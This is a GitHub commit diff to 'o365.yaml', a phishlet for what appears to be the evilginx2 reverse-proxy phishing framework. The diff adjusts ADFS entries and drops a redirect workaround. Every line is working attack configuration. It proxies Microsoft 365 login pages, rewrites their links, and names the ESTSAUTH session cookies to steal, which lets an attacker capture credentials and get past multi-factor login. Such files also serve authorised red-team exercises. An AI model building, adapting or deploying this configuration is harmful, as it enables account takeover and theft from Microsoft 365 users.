Workaround removed

Due to fix in main code, workaround for redirect issue was removed
ithacy86 · Feb 21, 2019 · 1573a00 · 1573a00
1 parent 569af48
commit 1573a00
Showing 1 changed file with 6 additions and 8 deletions.
diff --git a/phishlets/o365.yaml b/phishlets/o365.yaml
@@ -4,22 +4,20 @@ min_ver: '2.3.0'
 proxy_hosts:
   - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
   - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
-  # The ones below are needed if your target organization utilizes ADFS.
-  # If they do not, you can comment out all lines that contain <...>
+  # The lines below are needed if your target organization utilizes ADFS.
+  # If they do, you need to uncomment all following lines that contain <...>
   # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
   # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
   #    <insert-adfs-subdomain> = adfs
   #    <insert-adfs-host> = example.com
   #    <insert-adfs-subdomain-and-host> = adfs.example.com
-  - {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
-  - {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
+  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
+  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
 sub_filters:
   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
-  - {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
-  # The `redirect_url` does not work properly on O365: https://github.com/kgretzky/evilginx2/pull/178#issuecomment-463380284
-  # Uncomment the following line and set your desired redirection URL in the field for <insert-redirect-url>
-  #- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: '<title>Working\.\.\.</title></head><body>.+</body>', replace: '<title>Working...</title><meta http-equiv="refresh" content="0;url=<insert-redirect-url>" /></head><body></body>', mimes: ['text/html']}
+  # Uncomment and fill in if your target organization utilizes ADFS
+  #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
 auth_tokens:
   - domain: '.login.microsoftonline.com'
     keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']